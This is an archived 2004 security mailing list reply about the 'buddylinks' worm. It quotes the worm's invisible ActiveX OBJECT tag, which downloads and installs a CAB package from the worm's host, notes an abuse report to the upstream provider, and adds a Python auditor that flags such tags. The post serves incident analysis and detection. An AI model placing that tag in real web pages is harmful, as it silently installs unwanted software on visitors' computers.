Security Incidents mailing list archives

Re: buddylinks worm


From: Jason Yates <jaywhy2 () comcast net>
Date: Tue, 10 Feb 2004 19:07:09 -0500

Jeremy Junginger wrote:

Yep!  It actually uses the following method:

<OBJECT ID="ShellInstaller" WIDTH=0 HEIGHT=0
CLASSID="CLSID:FDDCE9FF-1FC6-413c-80B1-37B101FDA1D4"
CODEBASE="http://download.buddylinks.net/ShellInstaller.cab#Version=1,0,0,001">
</OBJECT>

To install ShellINstaller.INF (Size: 2,119) and ShellInstaller.ocx (Size
81,920), which is an ActiveX control.  That's all I've found so far.  Let me
know if you guys find anything else.

I contacted internap.com, their upstream provider. The support guy I talked to told me to email abuse () internap com and they'll look into it. I emailed the information, but I really didn't think anything would come of it. The support rep didn't seem like he really cared. I guess I was wrong though. I can't ping buddylinks.net anymore. Although I wouldn't credit internap.com yet; it's just as likely they got DOS'd by the amount of requests and crashed.
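
For anyone checking saved pages or proxy captures for the install method quoted above, here is a small auditor that flags OBJECT tags pulling a package from a remote CODEBASE. It is an added example, not part of the original messages; the names `ObjectTagAuditor` and `audit_html` and the second (benign) tag in the sample are constructed for illustration.

```python
from html.parser import HTMLParser
from urllib.parse import urlsplit

# Sample input: the tag quoted in the message above (line wrap inside CODEBASE
# included), plus a constructed OBJECT tag with no remote package for contrast.
SAMPLE = '''<OBJECT ID="ShellInstaller" WIDTH=0 HEIGHT=0
CLASSID="CLSID:FDDCE9FF-1FC6-413c-80B1-37B101FDA1D4"
CODEBASE="http://download.buddylinks.net/ShellInstaller.cab#Version=1,0,0,001
">
</OBJECT>
<object id="player" width="320" height="240"
classid="clsid:00000000-0000-0000-0000-000000000000"></object>'''


class ObjectTagAuditor(HTMLParser):
    """Collects OBJECT tags that pull an ActiveX package from a remote host."""
    def __init__(self):
        super().__init__()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        if tag != "object":
            return
        a = {k: (v or "").strip() for k, v in attrs}  # attribute names arrive lower-cased
        url = urlsplit(a.get("codebase", ""))
        if url.scheme not in ("http", "https") or not url.hostname:
            return  # no remote package referenced, so nothing is flagged
        reasons = ["remote CODEBASE host " + url.hostname]
        if url.path.lower().endswith(".cab"):
            reasons.append("CODEBASE is a CAB install package")
        if a.get("width") == "0" and a.get("height") == "0":
            reasons.append("zero-size (invisible) object")
        self.findings.append({"id": a.get("id", ""),
                              "classid": a.get("classid", "").upper(),
                              "codebase": url.geturl(),
                              "reasons": reasons})


def audit_html(html):
    auditor = ObjectTagAuditor()
    auditor.feed(html)
    auditor.close()
    return auditor.findings


if __name__ == "__main__":
    for f in audit_html(SAMPLE):
        print(f["id"], f["classid"], f["codebase"], "; ".join(f["reasons"]))
```

The normalized CLSID in each finding can be matched against an allow list of controls that are expected in the environment.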
